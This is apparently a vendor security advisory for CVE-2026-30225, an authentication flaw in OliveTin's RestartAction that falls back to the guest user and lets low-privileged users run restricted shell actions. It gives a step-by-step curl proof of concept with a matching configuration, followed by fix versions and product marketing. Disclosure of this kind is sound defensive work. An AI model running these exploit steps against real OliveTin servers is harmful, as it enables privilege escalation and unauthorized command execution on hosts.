CVE-2026-30225

CVE-2026-30225 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260305000458-cb46a597b246. It is fixed in 0.0.0-20260305000458-cb46a597b246.

Summary

An authentication context confusion vulnerability in RestartAction allows a low‑privileged authenticated user to execute actions they are not permitted to run.

RestartAction constructs a new internal connect.Request without preserving the original caller’s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution.

This vulnerability allows a low‑privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions.

Details

Affected files:

service/internal/api/api.go

service/internal/auth/authcheck.go

Relevant code in RestartAction:

return api.StartAction(ctx, &connect.Request[apiv1.StartActionRequest]{
    Msg: &apiv1.StartActionRequest{
        BindingId:        execReqLogEntry.GetBindingId(),
        UniqueTrackingId: req.Msg.ExecutionTrackingId,
    },
})

Authentication in StartAction:

authenticatedUser := auth.UserFromApiCall(ctx, req, api.cfg)

Issue:

  1. RestartAction creates a new connect.Request object.

  2. The new request does not preserve caller headers or cookies.

  3. UserFromApiCall() attempts to resolve the user from the request.

  4. Because authentication headers are missing, it falls back to the guest user.

  5. If guest.exec = true while the original caller has exec = false, the action executes with elevated privileges.

PoC

Configuration:

defaultPermissions:
  exec: false

users:
  - username: low
    password: lowpass
    permissions:
      exec: false

  - username: guest
    permissions:
      exec: true

actions:
  - id: restart_bypass_action
    shell: |
      echo "pwned" > /tmp/olivetin_restart_bypass.txt

Steps to reproduce:

Login as low user

LOW_LOGIN=$(curl -sS -i -X POST \
  http://localhost:1337/olivetin.api.v1.OliveTinApiService/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')

LOW_SID=$(printf '%s\n' "$LOW_LOGIN" | tr -d '\r' | \
  awk -F'[=;]' '/^Set-Cookie: olivetin-sid-local=/{print $2; exit}')

Attempt direct execution (correctly blocked)

LOW_RUN=$(curl -sS -X POST \
  http://localhost:1337/olivetin.api.v1.OliveTinApiService/StartActionAndWait \
  -H 'Content-Type: application/json' \
  -H "Cookie: olivetin-sid-local=$LOW_SID" \
  -d '{"actionId":"restart_bypass_action"}')

echo "$LOW_RUN"

This should return permission denied.

Extract executionTrackingId from response:

TRACKING_ID=$(printf '%s' "$LOW_RUN" | \
  sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p' | head -n1)

echo "Tracking ID: $TRACKING_ID"

Call RestartAction:

curl -sS -X POST \
  http://localhost:1337/olivetin.api.v1.OliveTinApiService/RestartAction \
  -H 'Content-Type: application/json' \
  -H "Cookie: olivetin-sid-local=$LOW_SID" \
  -d "{\"executionTrackingId\":\"$TRACKING_ID\"}"

Verify command executed:

cat /tmp/olivetin_restart_bypass.txt

Output:

pwned

Impact

  • Privilege Escalation
  • ACL Bypass
  • Unauthorized Command Execution

Any authenticated low-privilege user can execute actions they are not authorized to run if:

  • Guest has broader permissions
  • RestartAction is enabled
    Because OliveTin actions execute system shell commands, this can lead to:
  • Arbitrary file writes
  • Sensitive data exposure
  • Potential full host compromise (depending on OliveTin runtime privileges)

This affects all deployments where:

  • guest.exec = true
  • A restricted user has exec = false
  • RestartAction endpoint is accessible

CVE-2026-30225 has a CVSS score of 5.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260305000458-cb46a597b246); upgrading removes the vulnerable code path.

Affected versions

github.com/OliveTin/OliveTin (< 0.0.0-20260305000458-cb46a597b246)

Security releases

github.com/OliveTin/OliveTin → 0.0.0-20260305000458-cb46a597b246 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260305000458-cb46a597b246 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30225? CVE-2026-30225 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260305000458-cb46a597b246. It is fixed in 0.0.0-20260305000458-cb46a597b246.
  2. How severe is CVE-2026-30225? CVE-2026-30225 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-30225? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260305000458-cb46a597b246 is affected.
  4. Is there a fix for CVE-2026-30225? Yes. CVE-2026-30225 is fixed in 0.0.0-20260305000458-cb46a597b246. Upgrade to this version or later.
  5. Is CVE-2026-30225 exploitable, and should I be worried? Whether CVE-2026-30225 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-30225 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-30225? Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260305000458-cb46a597b246 or later.

Other vulnerabilities in github.com/OliveTin/OliveTin

CVE-2026-53541CVE-2026-48709CVE-2026-48708CVE-2026-32102CVE-2026-31817

Stop the waste.
Protect your environment with Kodem.